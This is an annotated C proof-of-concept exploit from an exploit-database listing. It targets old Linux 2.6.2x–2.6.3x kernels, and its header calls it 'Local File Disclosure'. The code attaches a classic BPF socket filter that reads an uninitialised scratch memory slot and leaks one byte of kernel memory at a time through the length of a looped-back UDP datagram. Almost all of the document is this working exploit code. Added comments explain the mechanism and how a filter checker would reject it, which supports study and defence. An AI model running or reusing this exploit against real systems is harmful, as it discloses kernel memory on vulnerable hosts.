- 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
- 0 _ __ __ __ 1
- 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
- 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
- 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
- 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
- 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
- 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
- 1 \ \____/ >> Exploit database separated by exploit 0
- 0 \/___/ type (local, remote, DoS, etc.) 1
- 1 0
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
- /*
- * Local File Disclosure
- * Linux Kernel 2.6.2* - 2.6.3*
- * By > CrosS
- * Greetz > r0073r , r4dc0re , Side^effects(1337day.com)
- * Ataman , S4(uR4 , Xenu , kokoko(r00tw0rm.com)
- */
- #include <string.h>
- #include <stdio.h>
- #include <netinet/in.h>
- #include <sys/socket.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <linux/filter.h>
- #define PORT 37337
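/**
 * Loop one UDP datagram back to the filtered socket and report how many
 * bytes of it the receiver was handed.
 *
 * The process forks. The parent blocks in recvfrom() on recvsock; the child
 * waits one second, sends a zero-filled 512-byte datagram from sendsock to
 * 127.0.0.1:PORT and exits. The payload carries no information: the caller
 * only looks at the returned length, which a socket filter attached to
 * recvsock can shorten.
 *
 * @param sendsock  UDP socket the child sends from.
 * @param recvsock  UDP socket bound to PORT that the parent reads from.
 * @return  Byte count reported by recvfrom() in the parent, or -1 if fork()
 *          or recvfrom() failed. The child never returns.
 */
int transfer(int sendsock, int recvsock)
{
    struct sockaddr_in addr;
    char buf[512];
    socklen_t len = sizeof(addr);   /* recvfrom() takes a socklen_t *, not an int * */
    pid_t pid;

    memset(buf, 0, sizeof(buf));

    pid = fork();
    if (pid < 0)
        return -1;   /* without a child nothing is ever sent and recvfrom() would block */

    if (pid > 0)
        return (int)recvfrom(recvsock, buf, sizeof(buf), 0,
                             (struct sockaddr *)&addr, &len);

    /* Child. The original delays the send by one second, presumably so the
     * parent is already waiting in recvfrom(). */
    sleep(1);
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    /* Same address as inet_addr("127.0.0.1"), but declared by <netinet/in.h>,
     * which the file includes; inet_addr() needs <arpa/inet.h>, which it does not. */
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    if (sendto(sendsock, buf, sizeof(buf), 0,
               (struct sockaddr *)&addr, sizeof(addr)) < 0)
        _exit(1);

    /* _exit() so the child does not run the parent's atexit/stdio teardown. */
    _exit(0);
}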
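/**
 * Proof of concept: report one byte of a classic-BPF scratch slot by encoding
 * it in the length of a received datagram.
 *
 * What the code does, as visible here:
 *   - binds a UDP socket to PORT and attaches a five-instruction filter to it;
 *   - the filter's first instruction is BPF_LD|BPF_MEM, a load from scratch
 *     slot k, and nothing in the program stores to that slot first, so the
 *     value loaded is whatever the kernel left there;
 *   - the next two instructions mask and shift out the byte selected by the
 *     offset argument, 256 is added, and BPF_RET|BPF_A returns the sum as the
 *     number of packet bytes to keep;
 *   - transfer() then sends a 512-byte datagram to the socket and returns the
 *     length recvfrom() reports, from which the byte is recovered.
 *
 * Despite the "Local File Disclosure" title in the file header, the code
 * touches no file: what is read is filter scratch memory. On the kernel range
 * named in the header the slot is reportedly not cleared before the filter
 * runs; this is not verifiable from this file.
 *
 * Defensive reading: a filter that executes BPF_LD|BPF_MEM (or BPF_LDX|BPF_MEM)
 * on a slot with no earlier BPF_ST/BPF_STX to it is the pattern to reject or
 * flag. Kernels whose filter checker enforces store-before-load should fail
 * the setsockopt() call below, so the program stops at the "install filter"
 * error on a fixed system.
 *
 * @param argc  Must be 2.
 * @param argv  argv[1] is the byte offset, decimal 0-63 (16 scratch words of
 *              4 bytes, going by the bound checked here).
 * @return  0 after printing the byte, -1 on any usage or socket error.
 */
int main(int argc, char * argv[])
{
    int sendsock = -1, recvsock = -1, ret;
    int rc = -1;
    unsigned long val;
    unsigned int shift;
    char *end;
    struct sockaddr_in addr;
    struct sock_fprog fprog;
    struct sock_filter filters[5];

    if (argc != 2) {
        printf("[*] Usage: %s offset (0-63)\n", argv[0]);
        return -1;
    }

    /* strtoul() with an end-pointer check instead of atoi(): atoi() turned
     * non-numeric input into offset 0 without any diagnostic. */
    val = strtoul(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || val > 63) {
        printf("[*] Inv4liD by7e oFfs3t (must be 0-63)\n");
        return -1;
    }

    recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (recvsock < 0 || sendsock < 0) {
        printf("[*] CoulD no7 Cre4t3 soCke7s.\n");
        goto out;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        printf("[*] CoulD no7 biNd soCke7.\n");
        goto out;
    }

    memset(&fprog, 0, sizeof(fprog));
    memset(filters, 0, sizeof(filters));

    /* Bit position of the requested byte inside its 32-bit scratch word. */
    shift = (unsigned int)(val % 4) * 8;

    /* A = scratch[val / 4]; no store to that slot precedes this load. */
    filters[0].code = BPF_LD|BPF_MEM;
    filters[0].k = (unsigned int)(val / 4);
    /* A &= byte mask. 0xffu keeps the shift unsigned: 0xff << 24 on a signed
     * int overflows, which is undefined behaviour. */
    filters[1].code = BPF_ALU|BPF_AND|BPF_K;
    filters[1].k = 0xffu << shift;
    /* A >>= shift, leaving the byte in the low 8 bits. */
    filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
    filters[2].k = shift;
    /* A += 256, so the result is never zero (a zero return would drop the
     * packet) and stays below the 512-byte datagram sent by transfer(). */
    filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
    filters[3].k = 256;
    /* Return A as the number of packet bytes to accept. */
    filters[4].code = BPF_RET|BPF_A;

    fprog.len = 5;
    fprog.filter = filters;
    if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) {
        printf("[*] F41leD 7o 1nstaLl fiLteR y0u m0f0 h3aD.\n");
        goto out;
    }

    ret = transfer(sendsock, recvsock);
    if (ret < 0) {
        /* The original printed a meaningless value when the receive failed. */
        printf("[*] Transfer failed.\n");
        goto out;
    }

    /* 248 = the 256 added by the filter minus 8; presumably the filter length
     * also counts the 8-byte UDP header, which recvfrom() does not report.
     * TODO confirm against the kernel in question. */
    printf("[*] Your byte: 0x%.02x\n", ret - 248);
    rc = 0;

out:
    if (recvsock >= 0)
        close(recvsock);
    if (sendsock >= 0)
        close(sendsock);
    return rc;
}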